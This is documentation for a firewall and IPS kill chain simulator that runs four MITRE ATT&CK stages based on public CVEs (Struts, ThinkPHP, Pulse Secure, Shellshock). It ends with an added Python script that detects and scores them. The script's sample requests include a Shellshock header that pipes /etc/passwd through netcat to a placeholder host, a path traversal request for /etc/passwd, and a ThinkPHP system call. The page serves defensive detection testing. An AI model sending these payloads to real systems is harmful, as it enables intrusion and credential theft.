MITRE ATT&CK Simulator — Complete Guide

Understand how the kill chain simulator works and how to interpret the results.

What Is a Kill Chain?

Real-world cyberattacks progress through a sequence of stages, from the first foothold to the theft of data. If your security controls break the chain at any point, the attacker fails. The simulator executes four such stages in order, each mapped to a MITRE ATT&CK technique ID.

💡 Key Concept: Unlike the independent NGFW tests, which pass or fail in isolation, the kill chain runs its tests in order. In a real attack each stage depends on the previous one succeeding, so blocking an early stage denies the attacker everything that follows it.

How to Use

  1. Navigate to MITRE ATT&CK from the sidebar.
  2. Review the four stage cards.
  3. Click Execute Kill Chain.
  4. Watch the console as the stages run in order, one every 1.2 seconds, and note whether each is reported as blocked or allowed.
  5. The summary shows how many stages were blocked out of 4.

Kill Chain Stages

Stage 1 — Initial Access (T1190)

Sends an Apache Struts 2 RCE payload (CVE-2017-5638): an OGNL expression injected into the HTTP Content-Type header, which the vulnerable Jakarta Multipart parser evaluates while building its error message. Tests IPS detection of header-based remote code execution exploits.

Stage 2 — Execution (T1059.004)

Sends a ThinkPHP 5.x RCE exploit (CVE-2018-20062), abusing the framework's routing to invoke an arbitrary function, with a reverse shell download command carried in the request URL. Tests IPS detection of command execution via vulnerable web frameworks.

Stage 3 — Credential Access (T1003.001)

Exploits the Pulse Secure VPN arbitrary file read (CVE-2019-11510), a pre-authentication path traversal in the web interface, to request the appliance's cached cleartext credential files. Tests IPS detection of path traversal-based credential theft. Note that ATT&CK defines T1003.001 as OS Credential Dumping: LSASS Memory, a Windows technique; what this stage actually simulates, reading credentials out of files on a Linux-based appliance, is closer to T1552.001 (Unsecured Credentials: Credentials In Files). Treat the ID on the card as a label for the stage rather than a precise mapping.

Stage 4 — Exfiltration (T1048.003)

Injects a Shellshock payload (CVE-2014-6271) into an HTTP header that a CGI script receives as an environment variable, so that a vulnerable Bash executes the command appended to the function definition and sends system files out with netcat. Tests IPS detection of Bash environment variable injection attacks.

Interpreting Results

  • 4/4 blocked — Excellent. The chain is broken at every stage; a real attacker would not get past Initial Access.
  • 3/4 blocked — One gap. The console shows which stage was allowed through; review IPS signature coverage for that CVE. A gap late in the chain only matters once the earlier stages are also bypassed, but it should still be closed.
  • 1-2/4 blocked — Multiple gaps. Review which IPS signatures are enabled and which policy rule the test traffic actually matches.
  • 0/4 blocked — The traffic was most likely never inspected. Check that SSL Decryption is enabled (the IPS cannot match signatures inside TLS it does not decrypt), that an IPS profile is applied to the rule the test traffic hits, and that the traffic really passes through the firewall.
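The script below is an added example written for this page, not code from the simulator. It ties the stage descriptions to the result interpretation: it classifies raw HTTP requests into the four stages by the payload markers described above, then scores a run the way the summary does, additionally reporting the earliest blocked stage, which is where the chain actually breaks for an attacker. The sample requests are constructed and truncated here (target.example and 192.0.2.10 are placeholders, the payloads are not working exploits), and the regexes are illustrative detection logic, not the simulator's or any vendor's IPS signatures.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Stage table: (stage name, ATT&CK technique shown on the card, CVE, marker regex).
# The regexes match the payload markers described in the stage descriptions; they are
# illustrative detection logic written for this page, not real IPS signatures.
STAGES = [
    ("Initial Access", "T1190", "CVE-2017-5638",
     re.compile(r"^Content-Type:.*%\{", re.I | re.M)),                        # OGNL expression in Content-Type
    ("Execution", "T1059.004", "CVE-2018-20062",
     re.compile(r"think\\app/invokefunction", re.I)),                         # ThinkPHP 5.x invokefunction route
    ("Credential Access", "T1003.001", "CVE-2019-11510",
     re.compile(r"/dana-na/\.\./dana/html5acc/guacamole/(?:\.\./)+", re.I)),  # Pulse Secure traversal prefix
    ("Exfiltration", "T1048.003", "CVE-2014-6271",
     re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),                                  # Shellshock "() { :;};" marker
]

# Constructed sample requests (truncated markers only, not working exploits).
SAMPLE_REQUESTS = {
    "stage1": ("POST /struts2-showcase/index.action HTTP/1.1\r\nHost: target.example\r\n"
               "Content-Type: %{(#_='multipart/form-data').(#cmd='id')}\r\n\r\n"),
    "stage2": ("GET /index.php?s=index/\\think\\app/invokefunction"
               "&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1\r\n"
               "Host: target.example\r\n\r\n"),
    "stage3": ("GET /dana-na/../dana/html5acc/guacamole/../../../../../../../../etc/passwd"
               "?/dana/html5acc/guacamole/ HTTP/1.1\r\nHost: target.example\r\n\r\n"),
    "stage4": ("GET /cgi-bin/status HTTP/1.1\r\nHost: target.example\r\n"
               "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd | nc 192.0.2.10 4444'\r\n\r\n"),
}
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: target.example\r\nAccept: text/html\r\n\r\n"


def classify(raw_request: str) -> Optional[Tuple[str, str, str]]:
    """Return (stage, technique, cve) for the first stage marker found, or None if nothing matches."""
    for name, technique, cve, pattern in STAGES:
        if pattern.search(raw_request):
            return name, technique, cve
    return None


@dataclass
class ChainResult:
    blocked: int                                         # stages blocked, out of len(STAGES)
    broken_at: Optional[str]                             # earliest blocked stage; an attacker gets no further
    bypassed: List[str] = field(default_factory=list)    # stages the IPS let through
    guidance: str = ""


def evaluate_chain(outcomes: Dict[str, bool]) -> ChainResult:
    """outcomes maps stage name -> True if the console reported it blocked; missing stages count as allowed."""
    order = [stage[0] for stage in STAGES]
    blocked = [n for n in order if outcomes.get(n, False)]
    bypassed = [n for n in order if not outcomes.get(n, False)]
    count = len(blocked)
    if count == len(order):
        guidance = "Kill chain broken at every stage."
    elif count == len(order) - 1:
        guidance = f"One gap: {bypassed[0]} was allowed through; review signature coverage for its CVE."
    elif count >= 1:
        guidance = "Multiple gaps: review IPS signatures and the policy rule the test traffic matches."
    else:
        guidance = "Nothing blocked: confirm SSL decryption is on and an IPS profile applies to this traffic."
    return ChainResult(count, blocked[0] if blocked else None, bypassed, guidance)


if __name__ == "__main__":
    # Map each constructed request to its stage, then score a hypothetical console run.
    for key, req in SAMPLE_REQUESTS.items():
        print(key, "->", classify(req))
    print("benign ->", classify(BENIGN_REQUEST))
    result = evaluate_chain({"Initial Access": True, "Execution": True,
                             "Credential Access": False, "Exfiltration": True})
    print(f"{result.blocked}/4 blocked, chain breaks at {result.broken_at}; bypassed: {result.bypassed}")
    print(result.guidance)
```

Feed `evaluate_chain` the blocked/allowed verdicts read off the simulator console; `broken_at` is the stage a real attacker would never get past, while `bypassed` lists the signature gaps still worth closing. The stage markers are deliberately narrow (for example, the Struts check only looks at the Content-Type header), so a request that matches none of them returns None rather than a guess.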